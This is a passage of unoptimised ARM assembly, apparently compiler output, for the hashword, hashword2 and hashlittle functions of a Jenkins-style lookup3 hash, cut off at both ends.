#-16] ldr r3, [fp, #-8] ror r3, r3, #21 ldr r2, [fp, #-16] sub r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-12] ldr r3, [fp, #-16] eor r3, r3, r2 str r3, [fp, #-12] ldr r3, [fp, #-16] ror r3, r3, #7 ldr r2, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-12] ldr r2, [fp, #-8] ldr r3, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-8] ldr r3, [fp, #-12] ror r3, r3, #16 ldr r2, [fp, #-8] sub r3, r2, r3 str r3, [fp, #-8] ldr r2, [fp, #-16] ldr r3, [fp, #-8] eor r3, r3, r2 str r3, [fp, #-16] ldr r3, [fp, #-8] ror r3, r3, #28 ldr r2, [fp, #-16] sub r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-12] ldr r3, [fp, #-16] eor r3, r3, r2 str r3, [fp, #-12] ldr r3, [fp, #-16] ror r3, r3, #18 ldr r2, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-12] ldr r2, [fp, #-8] ldr r3, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-8] ldr r3, [fp, #-12] ror r3, r3, #8 ldr r2, [fp, #-8] sub r3, r2, r3 str r3, [fp, #-8] nop .L4: ldr r3, [fp, #-8] mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L12: .align 2 .L11: .word -559038737 .size hashword, .-hashword .align 2 .global hashword2 .syntax unified .arm .fpu softvfp .type hashword2, %function hashword2: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #36 str r0, [fp, #-24] str r1, [fp, #-28] str r2, [fp, #-32] str r3, [fp, #-36] ldr r3, [fp, #-28] lsl r2, r3, #2 ldr r3, [fp, #-32] ldr r3, [r3] add r2, r2, r3 ldr r3, .L22 add r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-8] str r3, [fp, #-12] ldr r3, [fp, #-12] str r3, [fp, #-16] ldr r3, [fp, #-36] ldr r3, [r3] ldr r2, [fp, #-8] add r3, r2, r3 str r3, [fp, #-8] b .L14 .L15: ldr r3, [fp, #-24] ldr r3, [r3] ldr r2, [fp, #-16] add r3, r2, r3 str r3, [fp, #-16] ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-12] add r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-24] add r3, r3, #8 ldr r3, [r3] ldr r2, [fp, #-8] add r3, r2, r3 str r3, [fp, #-8] ldr r2, [fp, #-16] ldr r3, [fp, #-8] sub r3, r2, r3 str r3, [fp, #-16] ldr r3, [fp, #-8] ror r3, r3, #28 ldr r2, [fp, #-16] eor r3, r3, r2 str r3, [fp, #-16] ldr r2, [fp, #-8] ldr r3, [fp, #-12] add r3, r2, r3 str r3, [fp, #-8] ldr r2, [fp, #-12] ldr r3, [fp, #-16] sub r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-16] ror r3, r3, #26 ldr r2, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-12] ldr r2, [fp, #-16] ldr r3, [fp, #-8] add r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-8] ldr r3, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-12] ror r3, r3, #24 ldr r2, [fp, #-8] eor r3, r3, r2 str r3, [fp, #-8] ldr r2, [fp, #-12] ldr r3, [fp, #-16] add r3, r2, r3 str r3, [fp, #-12] ldr r2, [fp, #-16] ldr r3, [fp, #-8] sub r3, r2, r3 str r3, [fp, #-16] ldr r3, [fp, #-8] ror r3, r3, #16 ldr r2, [fp, #-16] eor r3, r3, r2 str r3, [fp, #-16] ldr r2, [fp, #-8] ldr r3, [fp, #-12] add r3, r2, r3 str r3, [fp, #-8] ldr r2, [fp, #-12] ldr r3, [fp, #-16] sub r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-16] ror r3, r3, #13 ldr r2, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-12] ldr r2, [fp, #-16] ldr r3, [fp, #-8] add r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-8] ldr r3, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-12] ror r3, r3, #28 ldr r2, [fp, #-8] eor r3, r3, r2 str r3, [fp, #-8] ldr r2, [fp, #-12] ldr r3, [fp, #-16] add r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-28] sub r3, r3, #3 str r3, [fp, #-28] ldr r3, [fp, #-24] add r3, r3, #12 str r3, [fp, #-24] .L14: ldr r3, [fp, #-28] cmp r3, #3 bhi .L15 ldr r3, [fp, #-28] cmp r3, #3 ldrls pc, [pc, r3, asl #2] b .L16 .L18: .word .L16 .word .L20 .word .L19 .word .L17 .L17: ldr r3, [fp, #-24] add r3, r3, #8 ldr r3, [r3] ldr r2, [fp, #-8] add r3, r2, r3 str r3, [fp, #-8] .L19: ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-12] add r3, r2, r3 str r3, [fp, #-12] .L20: ldr r3, [fp, #-24] ldr r3, [r3] ldr r2, [fp, #-16] add r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-8] ldr r3, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-8] ldr r3, [fp, #-12] ror r3, r3, #18 ldr r2, [fp, #-8] sub r3, r2, r3 str r3, [fp, #-8] ldr r2, [fp, #-16] ldr r3, [fp, #-8] eor r3, r3, r2 str r3, [fp, #-16] ldr r3, [fp, #-8] ror r3, r3, #21 ldr r2, [fp, #-16] sub r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-12] ldr r3, [fp, #-16] eor r3, r3, r2 str r3, [fp, #-12] ldr r3, [fp, #-16] ror r3, r3, #7 ldr r2, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-12] ldr r2, [fp, #-8] ldr r3, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-8] ldr r3, [fp, #-12] ror r3, r3, #16 ldr r2, [fp, #-8] sub r3, r2, r3 str r3, [fp, #-8] ldr r2, [fp, #-16] ldr r3, [fp, #-8] eor r3, r3, r2 str r3, [fp, #-16] ldr r3, [fp, #-8] ror r3, r3, #28 ldr r2, [fp, #-16] sub r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-12] ldr r3, [fp, #-16] eor r3, r3, r2 str r3, [fp, #-12] ldr r3, [fp, #-16] ror r3, r3, #18 ldr r2, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-12] ldr r2, [fp, #-8] ldr r3, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-8] ldr r3, [fp, #-12] ror r3, r3, #8 ldr r2, [fp, #-8] sub r3, r2, r3 str r3, [fp, #-8] nop .L16: ldr r3, [fp, #-32] ldr r2, [fp, #-8] str r2, [r3] ldr r3, [fp, #-36] ldr r2, [fp, #-12] str r2, [r3] nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L23: .align 2 .L22: .word -559038737 .size hashword2, .-hashword2 .align 2 .global hashlittle .syntax unified .arm .fpu softvfp .type hashlittle, %function hashlittle: @ args = 0, pretend = 0, frame = 48 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #52 str r0, [fp, #-40] str r1, [fp, #-44] str r2, [fp, #-48] ldr r2, [fp, #-44] ldr r3, [fp, #-48] add r2, r2, r3 ldr r3, .L80 add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-24] str r3, [fp, #-28] ldr r3, [fp, #-28] str r3, [fp, #-32] ldr r3, [fp, #-40] str r3, [fp, #-36] ldr r3, [fp, #-36] and r3, r3, #3 cmp r3, #0 bne .L25 ldr r3, [fp, #-40] str r3, [fp, #-20] b .L26 .L27: ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] add r3, r3, #8 ldr r3, [r3] ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-32] ldr r3, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #28 ldr r2, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #26 ldr r2, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #24 ldr r2, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #16 ldr r2, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #13 ldr r2, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #28 ldr r2, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-44] sub r3, r3, #12 str r3, [fp, #-44] ldr r3, [fp, #-20] add r3, r3, #12 str r3, [fp, #-20] .L26: ldr r3, [fp, #-44] cmp r3, #12 bhi .L27 ldr r3, [fp, #-44] cmp r3, #12 ldrls pc, [pc, r3, asl #2] b .L44 .L30: .word .L42 .word .L41 .word .L40 .word .L39 .word .L38 .word .L37 .word .L36 .word .L35 .word .L34 .word .L33 .word .L32 .word .L31 .word .L29 .L29: ldr r3, [fp, #-20] add r3, r3, #8 ldr r3, [r3] ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L31: ldr r3, [fp, #-20] add r3, r3, #8 ldr r3, [r3] bic r3, r3, #-16777216 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L32: ldr r3, [fp, #-20] add r3, r3, #8 ldr r3, [r3] lsl r3, r3, #16 lsr r3, r3, #16 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L33: ldr r3, [fp, #-20] add r3, r3, #8 ldr r3, [r3] and r3, r3, #255 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L34: ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L35: ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] bic r3, r3, #-16777216 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L36: ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] lsl r3, r3, #16 lsr r3, r3, #16 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L37: ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] and r3, r3, #255 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L38: ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L39: ldr r3, [fp, #-20] ldr r3, [r3] bic r3, r3, #-16777216 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L40: ldr r3, [fp, #-20] ldr r3, [r3] lsl r3, r3, #16 lsr r3, r3, #16 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L41: ldr r3, [fp, #-20] ldr r3, [r3] and r3, r3, #255 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L42: ldr r3, [fp, #-24] b .L79 .L25: ldr r3, [fp, #-36] and r3, r3, #1 cmp r3, #0 bne .L45 ldr r3, [fp, #-40] str r3, [fp, #-16] b .L46 .L47: ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #2 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-16] add r3, r3, #4 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #6 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-16] add r3, r3, #8 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #10 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-32] ldr r3, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #28 ldr r2, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #26 ldr r2, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #24 ldr r2, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #16 ldr r2, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #13 ldr r2, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #28 ldr r2, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-44] sub r3, r3, #12 str r3, [fp, #-44] ldr r3, [fp, #-16] add r3, r3, #12 str r3, [fp, #-16] .L46: ldr r3, [fp, #-44] cmp r3, #12 bhi .L47 ldr r3, [fp, #-16] str r3, [fp, #-8] ldr r3, [fp, #-44] cmp r3, #12 ldrls pc, [pc, r3, asl #2] b .L44 .L50: .word .L62 .word .L61 .word .L60 .word .L59 .word .L58 .word .L57 .word .L56 .word .L55 .word .L54 .word .L53 .word .L52 .word .L51 .word .L49 .L49: ldr r3, [fp, #-16] add r3, r3, #8 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #10 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-16] add r3, r3, #4 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #6 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #2 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L51: ldr r3, [fp, #-8] add r3, r3, #10 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] .L52: ldr r3, [fp, #-16] add r3, r3, #8 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-24] add r3, r3, r2 str r3, [fp, #-24] ldr r3, [fp, #-16] add r3, r3, #4 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #6 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #2 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L53: ldr r3, [fp, #-8] add r3, r3, #8 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-24] add r3, r3, r2 str r3, [fp, #-24] .L54: ldr r3, [fp, #-16] add r3, r3, #4 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #6 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #2 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L55: ldr r3, [fp, #-8] add r3, r3, #6 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] .L56: ldr r3, [fp, #-16] add r3, r3, #4 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-28] add r3, r3, r2 str r3, [fp, #-28] ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #2 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L57: ldr r3, [fp, #-8] add r3, r3, #4 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-28] add r3, r3, r2 str r3, [fp, #-28] .L58: ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #2 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L44 .L59: ldr r3, [fp, #-8] add r3, r3, #2 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] .L60: ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-32] add r3, r3, r2 str r3, [fp, #-32] b .L44 .L61: ldr r3, [fp, #-8] ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-32] add r3, r3, r2 str r3, [fp, #-32] b .L44 .L62: ldr r3, [fp, #-24] b .L79 .L45: ldr r3, [fp, #-40] str r3, [fp, #-12] b .L63 .L64: ldr r3, [fp, #-12] ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-32] add r3, r3, r2 str r3, [fp, #-32] ldr r3, [fp, #-12] add r3, r3, #1 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-12] add r3, r3, #2 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-12] add r3, r3, #3 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-12] add r3, r3, #4 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-28] add r3, r3, r2 str r3, [fp, #-28] ldr r3, [fp, #-12] add r3, r3, #5 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-12] add r3, r3, #6 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-12] add r3, r3, #7 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-12] add r3, r3, #8 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-24] add r3, r3, r2 str r3, [fp, #-24] ldr r3, [fp, #-12] add r3, r3, #9 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-12] add r3, r3, #10 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-12] add r3, r3, #11 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-32] ldr r3, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #28 ldr r2, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #26 ldr r2, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #24 ldr r2, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #16 ldr r2, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #13 ldr r2, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #28 ldr r2, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-44] sub r3, r3, #12 str r3, [fp, #-44] ldr r3, [fp, #-12] add r3, r3, #12 str r3, [fp, #-12] .L63: ldr r3, [fp, #-44] cmp r3, #12 bhi .L64 ldr r3, [fp, #-44] cmp r3, #12 ldrls pc, [pc, r3, asl #2] b .L44 .L66: .word .L78 .word .L77 .word .L76 .word .L75 .word .L74 .word .L73 .word .L72 .word .L71 .word .L70 .word .L69 .word .L68 .word .L67 .word .L65 .L65: ldr r3, [fp, #-12] add r3, r3, #11 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] .L67: ldr r3, [fp, #-12] add r3, r3, #10 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] .L68: ldr r3, [fp, #-12] add r3, r3, #9 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] .L69: ldr r3, [fp, #-12] add r3, r3, #8 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-24] add r3, r3, r2 str r3, [fp, #-24] .L70: ldr r3, [fp, #-12] add r3, r3, #7 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] .L71: ldr r3, [fp, #-12] add r3, r3, #6 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] .L72: ldr r3, [fp, #-12] add r3, r3, #5 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] .L73: ldr r3, [fp, #-12] add r3, r3, #4 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-28] add r3, r3, r2 str r3, [fp, #-28] .L74: ldr r3, [fp, #-12] add r3, r3, #3 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] .L75: ldr r3, [fp, #-12] add r3, r3, #2 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] .L76: ldr r3, [fp, #-12] add r3, r3, #1 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] .L77: ldr r3, [fp, #-12] ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-32] add r3, r3, r2 str r3, [fp, #-32] b .L44 .L78: ldr r3, [fp, #-24] b .L79 .L44: ldr r2, [fp, #-24] ldr r3, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #18 ldr r2, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-32] ldr r3, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #21 ldr r2, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-28] ldr r3, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #7 ldr r2, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-28] ldr r2, [fp, #-24] ldr r3, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-24] ldr 